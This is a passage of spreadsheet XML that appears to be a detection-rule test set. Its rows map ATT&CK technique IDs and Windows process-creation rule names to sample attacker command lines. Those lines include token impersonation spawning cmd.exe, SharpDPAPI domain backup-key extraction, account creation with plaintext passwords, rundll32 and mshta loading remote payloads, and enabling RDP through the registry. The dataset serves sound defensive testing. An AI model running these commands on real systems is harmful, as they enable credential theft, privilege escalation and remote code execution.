      <c r="E2650" s="43" t="inlineStr">
        <is>
          <t>ren impersonate.exe sysupdate.exe &amp;&amp; sysupdate.exe exec cmd.exe</t>
        </is>
      </c>
      <c r="F2650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2650" s="43" t="n"/>
      <c r="J2650" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2650" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2651" ht="15.75" customHeight="1" s="42">
      <c r="A2651" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B2651" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C2651" s="43" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D2651" s="43" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
      <c r="E2651" s="43" t="inlineStr">
        <is>
          <t>sysupdate.exe list</t>
        </is>
      </c>
      <c r="F2651" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2651" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2651" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2651" s="43" t="n"/>
      <c r="J2651" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2651" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2652" ht="15.75" customHeight="1" s="42">
      <c r="A2652" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B2652" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C2652" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D2652" s="43" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E2652" s="43" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe backupkey --machine</t>
        </is>
      </c>
      <c r="F2652" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2652" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2652" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2652" s="43" t="n"/>
      <c r="J2652" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2652" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2653" ht="15.75" customHeight="1" s="42">
      <c r="A2653" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B2653" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C2653" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D2653" s="43" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E2653" s="43" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe backupkey "/machine"</t>
        </is>
      </c>
      <c r="F2653" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2653" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2653" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2653" s="43" t="n"/>
      <c r="J2653" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2653" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2654" ht="15.75" customHeight="1" s="42">
      <c r="A2654" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B2654" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C2654" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D2654" s="43" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E2654" s="43" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe "backupkey" /machine</t>
        </is>
      </c>
      <c r="F2654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2654" s="43" t="n"/>
      <c r="J2654" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2654" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2655" ht="15.75" customHeight="1" s="42">
      <c r="A2655" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B2655" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C2655" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D2655" s="43" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E2655" s="43" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe backupkey /machine:</t>
        </is>
      </c>
      <c r="F2655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2655" s="43" t="n"/>
      <c r="J2655" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2655" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2656" ht="15.75" customHeight="1" s="42">
      <c r="A2656" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B2656" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C2656" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D2656" s="43" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E2656" s="43" t="inlineStr">
        <is>
          <t>sysupdate.exe "user:Administrator" "binary:cmd.exe"</t>
        </is>
      </c>
      <c r="F2656" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2656" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2656" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2656" s="43" t="n"/>
      <c r="J2656" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2656" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2657" ht="15.75" customHeight="1" s="42">
      <c r="A2657" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B2657" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C2657" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D2657" s="43" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E2657" s="43" t="inlineStr">
        <is>
          <t>updater.exe --user Administrator --binary calc.exe</t>
        </is>
      </c>
      <c r="F2657" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2657" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2657" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2657" s="43" t="n"/>
      <c r="J2657" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2657" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2658" ht="15.75" customHeight="1" s="42">
      <c r="A2658" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B2658" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C2658" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D2658" s="43" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E2658" s="43" t="inlineStr">
        <is>
          <t>updater.exe technique:CreateProcessWithTokenW binary:cmd.exe pid:1337</t>
        </is>
      </c>
      <c r="F2658" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2658" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2658" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2658" s="43" t="n"/>
      <c r="J2658" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2658" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2659" ht="15.75" customHeight="1" s="42">
      <c r="A2659" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B2659" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C2659" s="43" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D2659" s="43" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E2659" s="43" t="inlineStr">
        <is>
          <t>"net.exe" user DOMAIN\user password123 /add</t>
        </is>
      </c>
      <c r="F2659" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2659" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2659" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2659" s="43" t="n"/>
      <c r="J2659" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2659" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2660" ht="15.75" customHeight="1" s="42">
      <c r="A2660" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B2660" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C2660" s="43" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D2660" s="43" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E2660" s="43" t="inlineStr">
        <is>
          <t>"net.exe" user DOMAIN\\user password123 /ADD</t>
        </is>
      </c>
      <c r="F2660" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2660" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2660" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2660" s="43" t="n"/>
      <c r="J2660" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2660" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2661" ht="15.75" customHeight="1" s="42">
      <c r="A2661" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B2661" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C2661" s="43" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D2661" s="43" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E2661" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe '//192.168.1.1/share/payload.dll',EntryPoint</t>
        </is>
      </c>
      <c r="F2661" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2661" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2661" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2661" s="43" t="n"/>
      <c r="J2661" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2661" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2662" ht="15.75" customHeight="1" s="42">
      <c r="A2662" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B2662" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2662" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2662" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2662" s="43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F2662" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2662" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2662" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2662" s="43" t="n"/>
      <c r="J2662" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2662" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2663" ht="15.75" customHeight="1" s="42">
      <c r="A2663" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B2663" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2663" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2663" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2663" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; (Resolve-Path (".\Win" + "Pwn.ps1")) -noninteractive"</t>
        </is>
      </c>
      <c r="F2663" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2663" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2663" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2663" s="43" t="n"/>
      <c r="J2663" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2663" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2664" ht="15.75" customHeight="1" s="42">
      <c r="A2664" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B2664" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_extrac32_ads</t>
        </is>
      </c>
      <c r="C2664" s="43" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Alternate Data Stream Execution</t>
        </is>
      </c>
      <c r="D2664" s="43" t="inlineStr">
        <is>
          <t>4b13db67-0c45-40f1-aba8-66a1a7198a1e</t>
        </is>
      </c>
      <c r="E2664" s="43" t="inlineStr">
        <is>
          <t>extrac32.exe /L "C:\\target\\path\" C:\\test\\data.cab file.txt:ads</t>
        </is>
      </c>
      <c r="F2664" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2664" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2664" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2664" s="43" t="n"/>
      <c r="J2664" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2664" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2665" ht="15.75" customHeight="1" s="42">
      <c r="A2665" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2665" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_invocation</t>
        </is>
      </c>
      <c r="C2665" s="43" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1</t>
        </is>
      </c>
      <c r="D2665" s="43" t="inlineStr">
        <is>
          <t>a0459f02-ac51-4c09-b511-b8c9203fc429</t>
        </is>
      </c>
      <c r="E2665" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Import-Module CL_Invocation.ps1; $method = 'SyncInvoke'; Get-Item Function:\$method | ForEach-Object { &amp; $_ 'calc.exe' ' ' }"</t>
        </is>
      </c>
      <c r="F2665" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2665" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2665" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2665" s="43" t="n"/>
      <c r="J2665" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2665" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2666" ht="15.75" customHeight="1" s="42">
      <c r="A2666" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B2666" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C2666" s="43" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D2666" s="43" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E2666" s="43" t="inlineStr">
        <is>
          <t>mshta.exe "C:\Users\Public\payload.png.hta"</t>
        </is>
      </c>
      <c r="F2666" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2666" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2666" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2666" s="43" t="n"/>
      <c r="J2666" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2666" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2667" ht="15.75" customHeight="1" s="42">
      <c r="A2667" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B2667" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C2667" s="43" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D2667" s="43" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E2667" s="43" t="inlineStr">
        <is>
          <t>mshta.exe "javascript:new%20ActiveXObject('WScript.Shell').Run('calc.exe');window.close();"</t>
        </is>
      </c>
      <c r="F2667" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2667" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2667" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2667" s="43" t="n"/>
      <c r="J2667" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2667" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2668" ht="15.75" customHeight="1" s="42">
      <c r="A2668" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B2668" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C2668" s="43" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D2668" s="43" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E2668" s="43" t="inlineStr">
        <is>
          <t>mshta.exe "http://example.com/payload.hta"</t>
        </is>
      </c>
      <c r="F2668" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2668" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2668" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2668" s="43" t="n"/>
      <c r="J2668" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2668" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2669" ht="15.75" customHeight="1" s="42">
      <c r="A2669" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B2669" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C2669" s="43" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D2669" s="43" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E2669" s="43" t="inlineStr">
        <is>
          <t>mshta.exe "C:\Users\Public\payload.hta"</t>
        </is>
      </c>
      <c r="F2669" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2669" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2669" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2669" s="43" t="n"/>
      <c r="J2669" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2669" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2670" ht="15.75" customHeight="1" s="42">
      <c r="A2670" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B2670" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C2670" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D2670" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E2670" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.Convert]::FromBase64String('d2hvYW1p')"</t>
        </is>
      </c>
      <c r="F2670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2670" s="43" t="n"/>
      <c r="J2670" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2670" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2671" ht="15.75" customHeight="1" s="42">
      <c r="A2671" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B2671" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C2671" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D2671" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E2671" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::( 'FromBase64String' )('d2hvYW1p')"</t>
        </is>
      </c>
      <c r="F2671" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2671" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2671" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2671" s="43" t="n"/>
      <c r="J2671" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2671" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2672" ht="15.75" customHeight="1" s="42">
      <c r="A2672" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B2672" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C2672" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D2672" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E2672" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String( 'd2hvYW1p' )"</t>
        </is>
      </c>
      <c r="F2672" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2672" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2672" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2672" s="43" t="n"/>
      <c r="J2672" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2672" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2673" ht="15.75" customHeight="1" s="42">
      <c r="A2673" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B2673" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C2673" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D2673" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E2673" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String([String]::new('d2hvYW1p'))"</t>
        </is>
      </c>
      <c r="F2673" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2673" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2673" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2673" s="43" t="n"/>
      <c r="J2673" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2673" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2674" ht="15.75" customHeight="1" s="42">
      <c r="A2674" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B2674" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C2674" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D2674" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E2674" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String( [System.Text.Encoding]::UTF8.GetString([System.Text.Encoding]::UTF8.GetBytes('d2hvYW1p')) )"</t>
        </is>
      </c>
      <c r="F2674" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2674" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2674" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2674" s="43" t="n"/>
      <c r="J2674" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2674" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2675" ht="15.75" customHeight="1" s="42">
      <c r="A2675" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B2675" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C2675" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D2675" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E2675" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String( (Get-Content 'C:\base64.txt') )"</t>
        </is>
      </c>
      <c r="F2675" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2675" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2675" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2675" s="43" t="n"/>
      <c r="J2675" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2675" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2676" ht="15.75" customHeight="1" s="42">
      <c r="A2676" s="43" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B2676" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_cli_obfuscation_escape_char</t>
        </is>
      </c>
      <c r="C2676" s="43" t="inlineStr">
        <is>
          <t>Potential Commandline Obfuscation Using Escape Characters</t>
        </is>
      </c>
      <c r="D2676" s="43" t="inlineStr">
        <is>
          <t>f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd</t>
        </is>
      </c>
      <c r="E2676" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c curl h"t"t"p"😕//example.com</t>
        </is>
      </c>
      <c r="F2676" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2676" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2676" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2676" s="43" t="n"/>
      <c r="J2676" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2676" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2677" ht="15.75" customHeight="1" s="42">
      <c r="A2677" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B2677" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C2677" s="43" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2677" s="43" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E2677" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal\ Server /v fDenyTSConnections /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2677" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2677" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2677" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2677" s="43" t="n"/>
      <c r="J2677" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2677" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2678" ht="15.75" customHeight="1" s="42">
      <c r="A2678" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B2678" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C2678" s="43" t="inlineStr">
        <is>
